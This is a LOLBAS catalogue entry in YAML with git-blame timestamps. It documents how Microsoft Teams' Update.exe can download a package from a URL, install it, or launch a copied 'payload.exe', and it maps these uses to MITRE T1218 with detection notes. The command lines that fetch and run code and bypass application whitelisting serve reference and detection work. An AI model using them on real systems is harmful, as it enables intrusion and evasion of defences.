LOLBAS/yml/OtherMSBinaries/update.yml

67 lines
3.0 KiB
YAML
Raw Normal View History

2019-06-27 14:26:24 +02:00
---
Name: Update.exe
2019-06-27 17:12:23 +02:00
Description: Binary to update the existing installed Nuget/squirrel package. Part of Microsoft Teams installation.
2019-06-27 17:01:34 +02:00
Author: 'Oddvar Moe'
Created: '2019-06-26'
2019-06-27 14:26:24 +02:00
Commands:
- Command: Update.exe --download [url to package]
2019-06-27 17:12:23 +02:00
Description: The above binary will go to url and look for RELEASES file and download the nuget package.
2019-06-28 09:05:27 +02:00
Usecase: Download binary
Category: Download
2019-06-27 17:01:34 +02:00
Privileges: User
2019-06-27 14:26:24 +02:00
MitreID: T1218
MitreLink: https://attack.mitre.org/techniques/T1218/
2019-06-27 17:01:34 +02:00
OperatingSystem: Windows 7 and up with Microsoft Teams installed
2019-06-28 09:05:27 +02:00
- Command: Update.exe --update [url to package]
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package.
2019-06-27 14:26:24 +02:00
Usecase: Download and execute binary
Category: AWL Bypass
2019-06-27 17:01:34 +02:00
Privileges: User
2019-06-27 14:26:24 +02:00
MitreID: T1218
MitreLink: https://attack.mitre.org/techniques/T1218/
2019-06-27 17:01:34 +02:00
OperatingSystem: Windows 7 and up with Microsoft Teams installed
2019-06-28 09:05:27 +02:00
- Command: Update.exe --update [url to package]
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package.
2019-06-27 14:26:24 +02:00
Usecase: Download and execute binary
2019-06-28 09:05:27 +02:00
Category: Execute
2019-06-27 17:01:34 +02:00
Privileges: User
2019-06-27 14:26:24 +02:00
MitreID: T1218
MitreLink: https://attack.mitre.org/techniques/T1218/
2019-06-27 17:01:34 +02:00
OperatingSystem: Windows 7 and up with Microsoft Teams installed
- Command: Update.exe --processStart payload.exe --process-start-args "whatever args"
Description: Copy your payload into %userprofile%\AppData\Local\Microsoft\Teams\current\. Then run the command. Update.exe will execute the file you copied.
Usecase: Application Whitelisting Bypass
Category: AWL Bypass
Privileges: User
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows 7 and up with Microsoft Teams installed
- Command: Update.exe --processStart payload.exe --process-start-args "whatever args"
Description: Copy your payload into %userprofile%\AppData\Local\Microsoft\Teams\current\. Then run the command. Update.exe will execute the file you copied.
Usecase: Execute binary
Category: Execute
Privileges: User
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows 7 and up with Microsoft Teams installed
2019-06-27 14:26:24 +02:00
Full_Path:
2019-06-27 17:01:34 +02:00
- Path: '%localappdata%\Microsoft\Teams\update.exe'
2019-06-27 14:26:24 +02:00
Code_Sample:
2019-06-27 17:01:34 +02:00
- Code: https://github.com/jreegun/POC-s/tree/master/nuget-squirrel
2019-06-27 14:26:24 +02:00
Detection:
2019-06-27 17:01:34 +02:00
- IOC: Update.exe spawned an unknown process
2019-06-27 14:26:24 +02:00
Resources:
2019-06-27 17:01:34 +02:00
- Link: https://www.youtube.com/watch?v=rOP3hnkj7ls
- Link: https://twitter.com/reegun21/status/1144182772623269889
- Link: https://twitter.com/MrUn1k0d3r/status/1143928885211537408
- Link: http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/
2019-06-28 08:48:41 +02:00
- Link: https://medium.com/@reegun/nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-80c9df51cf12
2019-06-27 17:01:34 +02:00
Acknowledgement:
2019-06-27 14:26:24 +02:00
- Person: Reegun J (OCBC Bank)
2019-06-27 17:01:34 +02:00
Handle: '@reegun21'
2019-06-27 14:26:24 +02:00
- Person: Mr.Un1k0d3r
2019-06-27 17:01:34 +02:00
Handle: '@MrUn1k0d3r'
- Person: Adam
Handle: '@Hexacorn'
2019-06-27 14:26:24 +02:00
---